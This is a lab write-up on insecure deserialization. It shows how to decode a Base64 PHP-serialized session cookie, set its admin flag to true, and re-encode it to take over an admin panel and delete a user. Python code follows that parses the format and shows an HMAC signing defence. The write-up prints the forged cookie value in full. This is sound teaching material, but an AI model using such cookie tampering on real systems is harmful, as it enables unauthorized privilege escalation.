Modifying Serialized Objects
Lab
Modifying serialized objects · Apprentice
Solution
Given
This lab uses a serialization-based session mechanism and is vulnerable to privilege escalation as a result. To solve the lab, edit the serialized object in the session cookie to exploit this vulnerability and gain administrative privileges. Then, delete the user carlos.
You can log in to your own account using the following credentials: wiener:peter
Analyzing the task
The app uses serialization to implement its session mechanism. We need to edit the serialized object to elevate our privileges and delete the user carlos.
Recon
Log in as the user:
POST /login HTTP/2
The response sets a cookie:
Set-Cookie: session=Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czo1OiJhZG1pbiI7YjowO30%3d; Secure; HttpOnly;
An unusually long string, so let's grab its value. The trailing `%3d` is a URL-encoded `=`, the Base64 padding character. In the Inspector we look at how it decodes from Base64:
O:4:"User":2:{s:8:"username";s:6:"wiener";s:5:"admin";b:0;}
That's a PHP-style serialized object (`O:4:"User"` is a `User` object with two properties). We can see the `admin` field: a boolean (`b:`) with value 0, i.e. false.
Exploitation
Set the value to 1, encode back to Base64, and put it back as the cookie:
O:4:"User":2:{s:8:"username";s:6:"wiener";s:5:"admin";b:1;}
Base64:
Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czo1OiJhZG1pbiI7YjoxO30=
Substitute the cookie — now we have access to the admin panel. Delete the user carlos. Lab solved!
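As an added example (not part of the original writeup or the lab's code), a small Python parser for the `O`/`s`/`b`/`i` subset of the PHP `serialize()` format, run against the cookie value above, followed by a constructed HMAC check showing how a signed session cookie would reject the edited `admin` flag. The key and the `body.tag` cookie layout are assumptions for illustration.

```python
import base64, hmac, hashlib

# Constructed from the page: the session cookie (URL-decoded) and the edited value.
COOKIE = "Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czo1OiJhZG1pbiI7YjowO30="
TAMPERED = "Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjY6IndpZW5lciI7czo1OiJhZG1pbiI7YjoxO30="

def parse_php(data, pos=0):
    """Parse the O/s/b/i subset of PHP serialize() output; returns (value, next_pos).
    An object comes back as (class_name, {property: value})."""
    tag = data[pos]
    if tag in "ib":                       # i:42;  b:0;
        end = data.index(";", pos)
        n = int(data[pos + 2:end])
        return (bool(n) if tag == "b" else n), end + 1
    if tag == "s":                        # s:6:"wiener";  PHP's length is in bytes; fine for ASCII
        colon = data.index(":", pos + 2)
        start = colon + 2                 # skip ':"'
        length = int(data[pos + 2:colon])
        return data[start:start + length], start + length + 2   # skip '";'
    if tag == "O":                        # O:4:"User":2:{...}
        colon = data.index(":", pos + 2)
        name_len = int(data[pos + 2:colon])
        name = data[colon + 2:colon + 2 + name_len]
        p = colon + name_len + 4          # past '":' to the property count
        colon2 = data.index(":", p)
        count, p, props = int(data[p:colon2]), colon2 + 2, {}
        for _ in range(count):
            key, p = parse_php(data, p)
            props[key], p = parse_php(data, p)
        return (name, props), p + 1       # skip '}'
    raise ValueError(f"unsupported tag {tag!r} at offset {pos}")

def decode_session(cookie):
    return parse_php(base64.b64decode(cookie).decode())[0]

# Hardened variant (assumed design, not the lab's code): sign the serialized bytes with an
# HMAC so an edited admin flag no longer verifies. A real fix also stops calling
# unserialize() on client-controlled data; this only shows the integrity check.
def sign(serialized: bytes, key: bytes) -> str:
    return base64.b64encode(serialized).decode() + "." + hmac.new(key, serialized, hashlib.sha256).hexdigest()

def verify(cookie: str, key: bytes):
    try:
        body, tag = cookie.rsplit(".", 1)
        raw = base64.b64decode(body, validate=True)
    except ValueError:
        return None
    expected = hmac.new(key, raw, hashlib.sha256).hexdigest()
    return parse_php(raw.decode())[0] if hmac.compare_digest(tag, expected) else None
```

Any edit to the object body invalidates the tag, so the server falls back to treating the request as unauthenticated instead of trusting `admin`.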